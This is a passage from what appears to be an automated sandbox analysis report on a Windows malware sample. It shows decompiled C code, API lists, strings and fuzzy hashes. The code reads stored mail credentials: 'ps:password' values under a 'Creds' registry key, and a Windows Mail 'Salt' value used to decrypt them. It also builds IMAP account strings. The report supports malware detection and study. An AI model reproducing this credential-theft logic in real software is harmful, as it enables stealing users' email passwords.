                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-232097475
                                                  • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                  • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                  • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                  • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}































                                                  0x00410525
                                                  0x00410525
                                                  0x00410536
                                                  0x00410538
                                                  0x00410544
                                                  0x0041054c
                                                  0x00410551
                                                  0x00410556
                                                  0x00410558
                                                  0x00410558
                                                  0x0041055c
                                                  0x00410562
                                                  0x00410566
                                                  0x00410567
                                                  0x0041056a
                                                  0x0041056c
                                                  0x0041056f
                                                  0x00410576
                                                  0x0041057d
                                                  0x00410581
                                                  0x00410587
                                                  0x0041058a
                                                  0x0041058d
                                                  0x0041058e
                                                  0x0041056c
                                                  0x004105a1
                                                  0x004105a8
                                                  0x004105bc
                                                  0x004105bf
                                                  0x004105c5
                                                  0x004105cd
                                                  0x004105d9
                                                  0x004105e2
                                                  0x004105e5
                                                  0x004105e7
                                                  0x00000000
                                                  0x004105e7
                                                  0x004105db
                                                  0x004105db
                                                  0x004105ec
                                                  0x004105f3
                                                  0x004105f9
                                                  0x004105f9
                                                  0x00410614
                                                  0x00410629
                                                  0x0041062c
                                                  0x00410637
                                                  0x00410637
                                                  0x00410640
                                                  0x00410646
                                                  0x0041064f
                                                  0x00410664
                                                  0x0041066e
                                                  0x00410670
                                                  0x00410688
                                                  0x00410693
                                                  0x0041069d
                                                  0x0041069d
                                                  0x004106a3
                                                  0x004106a6
                                                  0x004106ac
                                                  0x004106bb

                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • strlen.MSVCRT ref: 0041054C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                  • memset.MSVCRT ref: 004105A8
                                                  • memset.MSVCRT ref: 004105C5
                                                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                  • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                  • LocalFree.KERNEL32(?), ref: 0041069D
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                    • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                  Strings
                                                  • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                  • Salt, xrefs: 00410621
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                  • API String ID: 1673043434-2687544566
                                                  • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                  • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                  • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                  • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CBA7, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L00411612();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040D438(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L004115B2();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L004115B2();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L00411612();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                  0x0040cbb2
                                                  0x0040cbbb
                                                  0x0040cbbd
                                                  0x0040cbc0
                                                  0x0040cbcc
                                                  0x0040cbc2
                                                  0x0040cbc7
                                                  0x0040cbc7
                                                  0x0040cbce
                                                  0x0040cbd0
                                                  0x0040cbd5
                                                  0x0040cbd6
                                                  0x0040cbdb
                                                  0x0040cbe0
                                                  0x0040cc0b
                                                  0x0040cc11
                                                  0x0040cc14
                                                  0x0040cc23
                                                  0x0040cc32
                                                  0x0040cc3d
                                                  0x0040cc44
                                                  0x0040cc53
                                                  0x0040cc5a
                                                  0x0040cc5f
                                                  0x0040cc66
                                                  0x0040cc79
                                                  0x0040cc7e
                                                  0x0040cc85
                                                  0x0040cc98
                                                  0x0040cc9d
                                                  0x0040cc9f
                                                  0x0040cca5
                                                  0x0040ccac
                                                  0x0040ccac
                                                  0x0040ccaf
                                                  0x0040ccb0
                                                  0x0040ccb6
                                                  0x0040ccb7
                                                  0x0040ccc0
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccc2
                                                  0x0040ccc7
                                                  0x0040ccce
                                                  0x0040ccce
                                                  0x0040ccd1
                                                  0x0040ccd2
                                                  0x0040ccd8
                                                  0x0040ccd9
                                                  0x0040cce2
                                                  0x0040ccf4
                                                  0x0040ccf4
                                                  0x0040ccf7
                                                  0x0040cd03
                                                  0x0040cc21
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cd09
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cce4
                                                  0x0040ccf2
                                                  0x0040cd17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccf2
                                                  0x0040cc23
                                                  0x0040cbe2
                                                  0x0040cbe5
                                                  0x0040cbf1
                                                  0x0040cbe7
                                                  0x0040cbec
                                                  0x0040cbec
                                                  0x0040cbf3
                                                  0x0040cbf5
                                                  0x0040cbfa
                                                  0x0040cbfb
                                                  0x0040cc00
                                                  0x0040cc05
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cc05
                                                  0x0040cd1e
                                                  0x0040cd24

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  • API String ID: 4281260487-2229823034
                                                  • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                  • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                  • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                  • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CBA5, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t39;
				void* _t55;
				char* _t56;
				intOrPtr _t62;
				void* _t63;
				char* _t64;
				void* _t69;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				void* _t101;

				_t100 = _t99 - 0x4cc;
				_t94 = _a4;
				_t89 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
					_t39 = 0;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t39);
				L00411612();
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					L9:
					_a4 = 0;
					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
						while(1) {
							_t91 = E0040D438(_a4, _t89 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t91 + 0x104; // 0x104
							_t18 = _t91 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t91 + 0x104; // 0x104
							_t21 = _t91 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t55 = 0;
							_t101 = _t101 + 0x38;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t55);
							_t56 =  &_v620;
							_push(_t56);
							L004115B2();
							if(_t56 == 0) {
								goto L18;
							}
							_t63 = 0;
							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
							}
							_push(_t63);
							_t64 =  &_v1232;
							_push(_t64);
							L004115B2();
							if(_t64 != 0) {
								L19:
								_a4 = _a4 + 1;
								_t62 = _v8;
								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
									_t89 = _t62;
									continue;
								} else {
								}
							} else {
								goto L18;
							}
							goto L22;
							L18:
							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
							} else {
								goto L19;
							}
							goto L22;
						}
					}
				} else {
					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
						_t69 = 0;
					} else {
						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t69);
					L00411612();
					_t101 = _t101 + 0xc;
					if(_t69 == 0) {
						goto L9;
					}
				}
				L22:
				return 1;
			}






















                                                  0x0040cbaa
                                                  0x0040cbb2
                                                  0x0040cbbb
                                                  0x0040cbbd
                                                  0x0040cbc0
                                                  0x0040cbcc
                                                  0x0040cbc2
                                                  0x0040cbc7
                                                  0x0040cbc7
                                                  0x0040cbce
                                                  0x0040cbd0
                                                  0x0040cbd5
                                                  0x0040cbd6
                                                  0x0040cbdb
                                                  0x0040cbe0
                                                  0x0040cc0b
                                                  0x0040cc11
                                                  0x0040cc14
                                                  0x0040cc23
                                                  0x0040cc32
                                                  0x0040cc3d
                                                  0x0040cc44
                                                  0x0040cc53
                                                  0x0040cc5a
                                                  0x0040cc5f
                                                  0x0040cc66
                                                  0x0040cc79
                                                  0x0040cc7e
                                                  0x0040cc85
                                                  0x0040cc98
                                                  0x0040cc9d
                                                  0x0040cc9f
                                                  0x0040cca5
                                                  0x0040ccac
                                                  0x0040ccac
                                                  0x0040ccaf
                                                  0x0040ccb0
                                                  0x0040ccb6
                                                  0x0040ccb7
                                                  0x0040ccc0
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccc2
                                                  0x0040ccc7
                                                  0x0040ccce
                                                  0x0040ccce
                                                  0x0040ccd1
                                                  0x0040ccd2
                                                  0x0040ccd8
                                                  0x0040ccd9
                                                  0x0040cce2
                                                  0x0040ccf4
                                                  0x0040ccf4
                                                  0x0040ccf7
                                                  0x0040cd03
                                                  0x0040cc21
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cd09
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cce4
                                                  0x0040ccf2
                                                  0x0040cd17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040ccf2
                                                  0x0040cc23
                                                  0x0040cbe2
                                                  0x0040cbe5
                                                  0x0040cbf1
                                                  0x0040cbe7
                                                  0x0040cbec
                                                  0x0040cbec
                                                  0x0040cbf3
                                                  0x0040cbf5
                                                  0x0040cbfa
                                                  0x0040cbfb
                                                  0x0040cc00
                                                  0x0040cc05
                                                  0x00000000
                                                  0x00000000
                                                  0x0040cc05
                                                  0x0040cd1d
                                                  0x0040cd24

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp_strnicmpmemsetsprintf
                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                  • API String ID: 2822975062-2229823034
                                                  • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                  • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                  • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                  • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D6FB, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 118registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 56%
                                                  			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E004118A0(0x132c, __ecx);
				_t84 = 0;
				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060D0(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                  0x0040d703
                                                  0x0040d71a
                                                  0x0040d725
                                                  0x0040d729
                                                  0x0040d862
                                                  0x0040d862
                                                  0x0040d735
                                                  0x0040d743
                                                  0x0040d74b
                                                  0x0040d752
                                                  0x0040d753
                                                  0x0040d756
                                                  0x0040d844
                                                  0x0040d774
                                                  0x0040d792
                                                  0x0040d7a1
                                                  0x0040d7aa
                                                  0x0040d7b3
                                                  0x0040d7b9
                                                  0x0040d7bf
                                                  0x0040d7db
                                                  0x0040d7e4
                                                  0x0040d7ea
                                                  0x0040d7f1
                                                  0x0040d7f8
                                                  0x0040d812
                                                  0x0040d820
                                                  0x0040d825
                                                  0x0040d82b
                                                  0x0040d82b
                                                  0x0040d7db
                                                  0x0040d830
                                                  0x0040d830
                                                  0x0040d836
                                                  0x0040d839
                                                  0x0040d840
                                                  0x0040d841
                                                  0x0040d841
                                                  0x00000000

                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                  • memset.MSVCRT ref: 0040D743
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                  • LocalFree.KERNEL32(?), ref: 0040D825
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                  • API String ID: 551151806-1288872324
                                                  • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                  • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                  • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                  • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004080A3, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 56%
                                                  			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				char _t30;
				struct HMENU__* _t32;
				char _t39;
				void* _t42;
				struct HWND__* _t43;
				struct HMENU__* _t48;

				_t42 = __edi;
				_t38 = __ecx;
				E004118A0(0x1004, __ecx);
				_t55 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t39 =  *0x417488;
						__eflags = _t39;
						if(_t39 == 0) {
							L8:
							_push(_t42);
							sprintf(0x4172c0, "dialog_%d", _a12);
							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407E55(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00407FEB, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4172c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4171b4 =  *0x4171b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00407EFB(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}











                                                  0x004080a3
                                                  0x004080a3
                                                  0x004080ab
                                                  0x004080b0
                                                  0x004080b5
                                                  0x004080fb
                                                  0x004080ff
                                                  0x00408105
                                                  0x0040810e
                                                  0x00408110
                                                  0x00408126
                                                  0x00408126
                                                  0x00408134
                                                  0x00408155
                                                  0x0040815f
                                                  0x00408165
                                                  0x00408176
                                                  0x0040817c
                                                  0x00408182
                                                  0x00408190
                                                  0x00408196
                                                  0x0040819e
                                                  0x004081a5
                                                  0x00408112
                                                  0x00408120
                                                  0x00408120
                                                  0x00408122
                                                  0x00408124
                                                  0x00000000
                                                  0x00000000
                                                  0x00408114
                                                  0x00408117
                                                  0x0040811d
                                                  0x0040811d
                                                  0x00000000
                                                  0x0040811d
                                                  0x00000000
                                                  0x00408117
                                                  0x00000000
                                                  0x00408120
                                                  0x004081ac
                                                  0x004081ac
                                                  0x004080b7
                                                  0x004080c4
                                                  0x004080d2
                                                  0x004080d8
                                                  0x004080df
                                                  0x004080e1
                                                  0x004080e3
                                                  0x004080e4
                                                  0x004080e7
                                                  0x004080f0
                                                  0x004080f0
                                                  0x004081b2

                                                  APIs
                                                  • sprintf.MSVCRT ref: 004080C4
                                                  • LoadMenuA.USER32 ref: 004080D2
                                                    • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                    • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                    • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                    • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                  • DestroyMenu.USER32(00000000), ref: 004080F0
                                                  • sprintf.MSVCRT ref: 00408134
                                                  • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                  • memset.MSVCRT ref: 00408165
                                                  • GetWindowTextA.USER32 ref: 00408176
                                                  • EnumChildWindows.USER32 ref: 0040819E
                                                  • DestroyWindow.USER32(00000000), ref: 004081A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                  • String ID: caption$dialog_%d$menu_%d
                                                  • API String ID: 3259144588-3822380221
                                                  • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                  • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                  • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                  • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E056, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
